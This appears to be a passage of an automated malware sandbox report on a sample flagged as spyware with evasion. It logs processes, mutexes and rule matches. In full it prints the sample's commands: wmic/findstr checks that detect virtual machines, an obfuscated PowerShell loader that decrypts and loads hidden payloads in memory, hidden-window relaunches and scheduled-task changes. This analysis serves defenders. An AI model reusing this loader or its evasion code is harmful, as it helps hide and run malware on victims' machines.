Source: C:\Windows\System32\dwm.exeCode function: 45_3_00000262F1CA23F045_3_00000262F1CA23F0
Source: C:\Windows\System32\dwm.exeCode function: 45_3_00000262F1CACE1845_3_00000262F1CACE18
Source: C:\Windows\System32\dwm.exeCode function: 45_3_00000262F1CACC9445_3_00000262F1CACC94
Source: C:\Windows\System32\dwm.exeCode function: 45_2_00000262F1CD2FF045_2_00000262F1CD2FF0
Source: C:\Windows\System32\dwm.exeCode function: 45_2_00000262F1CDDA1845_2_00000262F1CDDA18
Source: C:\Windows\System32\dwm.exeCode function: 45_2_00000262F1CDD89445_2_00000262F1CDD894
Source: C:\Windows\System32\dwm.exeCode function: 45_2_00000262F1D02FF045_2_00000262F1D02FF0
Source: C:\Windows\System32\dwm.exeCode function: 45_2_00000262F1D0DA1845_2_00000262F1D0DA18
Source: C:\Windows\System32\dwm.exeCode function: 45_2_00000262F1D0D89445_2_00000262F1D0D894
Source: C:\Windows\System32\svchost.exeCode function: 46_3_0000023942AECE1846_3_0000023942AECE18
Source: C:\Windows\System32\svchost.exeCode function: 46_3_0000023942AE23F046_3_0000023942AE23F0
Source: C:\Windows\System32\svchost.exeCode function: 46_3_0000023942AECC9446_3_0000023942AECC94
Source: C:\Windows\System32\svchost.exeCode function: 46_2_0000023942B1DA1846_2_0000023942B1DA18
Source: C:\Windows\System32\svchost.exeCode function: 46_2_0000023942B12FF046_2_0000023942B12FF0
Source: C:\Windows\System32\svchost.exeCode function: 46_2_0000023942B1D89446_2_0000023942B1D894
Source: C:\Windows\System32\svchost.exeCode function: 47_3_000001EF056ACC9447_3_000001EF056ACC94
Source: C:\Windows\System32\svchost.exeCode function: 47_3_000001EF056A23F047_3_000001EF056A23F0
Source: C:\Windows\System32\svchost.exeCode function: 47_3_000001EF056ACE1847_3_000001EF056ACE18
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001EF056DD89447_2_000001EF056DD894
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001EF056D2FF047_2_000001EF056D2FF0
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001EF056DDA1847_2_000001EF056DDA18
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001EF0570D89447_2_000001EF0570D894
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001EF05702FF047_2_000001EF05702FF0
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001EF0570DA1847_2_000001EF0570DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2064 -s 2148
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2684
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2682
Source: unknownProcess created: Commandline size = 5417
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2684Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2682Jump to behavior
Source: Process Memory Space: powershell.exe PID: 2064, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5760, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.spyw.evad.winCMD@54/88@2/2
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,41_2_0000000140002D4C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,38_2_004011AD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,38_2_004017A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\6273870
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2332:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ee0b84a4-b7e5-4383-b65b-82bf094fa75b
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5760
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2064
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\2851471
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\364263
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4276:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2980:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1riomnp1.nuz.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\payload.cmd" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2064 -s 2148
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5760 -s 2424
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5760 -s 2388
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gUdwtNDYXkts{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EysuTOhjuDXEDH,[Parameter(Position=1)][Type]$WayEsuPNIC)$posiItcnXQZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$posiItcnXQZ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'ci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$posiItcnXQZ.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+'l',$WayEsuPNIC,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $posiItcnXQZ.CreateType();}$CXUkrbOMeMwqm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8069b1fa-ba4a-4345-b7be-cabb605146ce}
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
